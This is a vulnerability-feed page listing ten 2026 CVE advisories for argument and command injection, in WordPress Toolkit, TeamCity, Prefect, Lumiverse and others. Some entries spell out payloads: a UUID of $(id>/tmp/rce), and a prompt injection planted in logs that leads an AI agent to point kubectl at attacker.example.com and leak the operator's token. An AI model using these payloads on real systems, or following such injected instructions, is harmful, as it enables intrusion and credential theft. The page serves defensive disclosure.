Threats Tagged 'cwe-88'
View all threats tagged with 'cwe-88'. Filter and sort to focus on specific types of threats.
Stop chasing alerts. Route them.
Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.
Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)
API access activates after upgrading in Console -> Billing.
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.
Filter Threats
Narrow down the results by type, severity, or affected countries
Threats Tagged 'cwe-88'
Click on any threat for detailed analysis and mitigation recommendations
CVE-2026-47365: CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in WebPros WordPress-ToolkitCVE-2026-47365 0 Argument injection vulnerability in WordPress Toolkit before 6.11.0 as used in cPanel & WHM, allows remote authenticated users to bypass cross-tenant authorization and execute arbitrary wp-toolkit CLI commands as another account. Join the discussion | CVE Database V5 | 06/12/2026, 02:27:43 UTC Added: 06/12/2026, 03:30:07 UTC |
CVE-2026-47250: CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in Flux159 mcp-server-kubernetesCVE-2026-47250 0 mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0. Join the discussion | CVE Database V5 | 06/11/2026, 18:35:50 UTC Added: 06/11/2026, 19:00:43 UTC |
CVE-2026-46529: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') in mate-desktop atrilCVE-2026-46529 0 Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A single-click remote code execution vulnerability in versions prior to 1.26.3 and 1.28.4 allows an attacker to achieve arbitrary code execution as the user by tricking them into clicking a link inside a malicious PDF document. The PDF can be packaged as a polyglot file that is simultaneously a valid PDF and a valid ELF shared library, making the attack a single-file, single-click, configuration-independent RCE on stock atril installations. The root cause is `shell/ev-application.c:ev_spawn`, which builds a command line from attacker-controlled PDF link-destination fields without applying `g_shell_quote`. The cmdline is then handed to `g_app_info_create_from_commandline`, which shell-parses it back into argv — splitting any embedded `--gtk-module=PATH` into a separate argv element. GTK then `dlopen()`s the path during init, running any `__attribute__((constructor))` it finds. Versions 1.26.3 and 1.28.4 contain a patch for the issue. This is the same defect class as CVE-2023-51698 (CBT `--checkpoint-action` injection in `comics-document.c`, fixed in 1.6.2) but in a different code path (`shell/ev-application.c`) that the original patch did not touch. Join the discussion | GCVE Database | 06/10/2026, 19:46:23 UTC Added: 06/06/2026, 21:13:41 UTC |
CVE-2026-41013: CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in CloudFoundry Foundation smb-volume-releaseCVE-2026-41013 0 Input validation bypass in SMB volume mount handling in CloudFoundry Foundation diego-release allows low-privileged CF space developer to inject arbitrary kernel CIFS mount options via bypassing the mount-option allowlist, enabling privilege escalation and security control bypass on multi-tenant Diego cells. Affected versions: smb-volume-release: All versions prior to v3.60.0 CF Deployment: All versions prior to v56.0.0 Join the discussion | CVE Database V5 | 06/01/2026, 17:36:47 UTC Added: 06/01/2026, 19:52:38 UTC |
CVE-2026-49373: CWE-88 in JetBrains TeamCityCVE-2026-49373 0 CVE-2026-49373 is a high-severity vulnerability in JetBrains TeamCity before version 2026.1 that allows remote code execution via Perforce connection settings. The vulnerability is classified under CWE-88, which relates to improper neutralization of commands or arguments. There is no official patch or remediation level currently confirmed, and no known exploits in the wild have been reported. The vulnerability requires at least low privileges and no user interaction to exploit, with a high impact on confidentiality but limited impact on integrity and no impact on availability. Join the discussion | CVE Database V5 | 05/29/2026, 18:15:48 UTC Added: 05/29/2026, 18:33:46 UTC |
CVE-2026-48116: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') in Mintplex-Labs anything-llmCVE-2026-48116 0 CVE-2026-48116 is a command injection vulnerability in Mintplex-Labs anything-llm versions prior to 1.13.0. The issue arises because the filesystem-search-files agent skill passes an LLM-controlled pattern parameter to ripgrep without using an end-of-options separator, allowing specially crafted patterns to be interpreted as command options. This enables an attacker who can interact with the agent and has the filesystem plugin enabled to execute arbitrary commands inside the server container. The vulnerability is fixed in version 1.13.0. Join the discussion | CVE Database V5 | 05/28/2026, 21:19:51 UTC Added: 05/28/2026, 21:33:34 UTC |
CVE-2026-44712: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in mcdope pam_usbCVE-2026-44712 0 pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, a crafted UUID such as $(id>/tmp/rce) in the config causes root RCE when pamusb-conf --reset-pads is run. A USB device with a crafted filesystem UUID (some controllers allow this) can inject the payload at --add-device time. Also, userName from the XML config is passed to os.system() in pamusb-agent, which invokes a shell. This vulnerability is fixed in 0.8.7. Join the discussion | CVE Database V5 | 05/27/2026, 20:24:23 UTC Added: 05/27/2026, 21:03:35 UTC |
CVE-2026-44450: CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in prolix-oc LumiverseCVE-2026-44450 0 Lumiverse is a full-featured AI chat application. Prior to 0.9.7, the MCP server creation endpoint validates the command field against an allowlist of binary names but forwards the args array to the child process without any validation. Every binary on the allowlist accepts an inline-code execution flag (-e for node/bun, -c for python3/deno), giving any logged-in user arbitrary OS-level code execution on the Lumiverse server. The route requires only requireAuth (not requireOwner). The server binds on all interfaces (::) and the host-header rebinding check is bypassed trivially by any HTTP client that sends Host: localhost:<port> directly, making this exploitable from any machine with network access to the server port. This vulnerability is fixed in 0.9.7. Join the discussion | CVE Database V5 | 05/26/2026, 19:54:33 UTC Added: 05/26/2026, 20:35:38 UTC |
CVE-2026-44449: CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') in prolix-oc LumiverseCVE-2026-44449 0 CVE-2026-44449 is a critical command injection vulnerability in prolix-oc's Lumiverse AI chat application versions prior to 0.9.7. The issue arises when the toSmbPath(fullPath) call fails and the fallback method concatenates an unvalidated basename directly into an smbclient command script. This allows an attacker to inject shell commands via special characters like ';' and '! cmd', leading to arbitrary command execution on the Lumiverse server. The vulnerability is fixed in version 0.9.7. Join the discussion | CVE Database V5 | 05/26/2026, 20:00:12 UTC Added: 05/26/2026, 20:35:38 UTC |
CVE-2026-3515: CWE-88 Improper Neutralization of Argument Delimiters in a Command in prefecthq prefecthq/prefectCVE-2026-3515 0 A vulnerability in the `GitHubRepository` block of the `prefect-github` integration in Prefect version 3.6.18 allows an attacker to inject arbitrary git command-line options via the `reference` field. The `reference` field is concatenated directly into a `git clone` command string without proper sanitization, and then parsed by `shlex.split()`. This enables injection of options such as `-c`, leading to potential Server-Side Request Forgery (SSRF), credential theft, or remote code execution (RCE). The vulnerability affects both the `aget_directory()` and `get_directory()` methods in `src/integrations/prefect-github/prefect_github/repository.py`. This issue does not affect the GitLab and BitBucket integrations, which use a safer list-based command construction approach. Join the discussion | CVE Database V5 | 05/24/2026, 03:32:32 UTC Added: 05/24/2026, 05:01:37 UTC |
Showing 1 to 10 of 80 results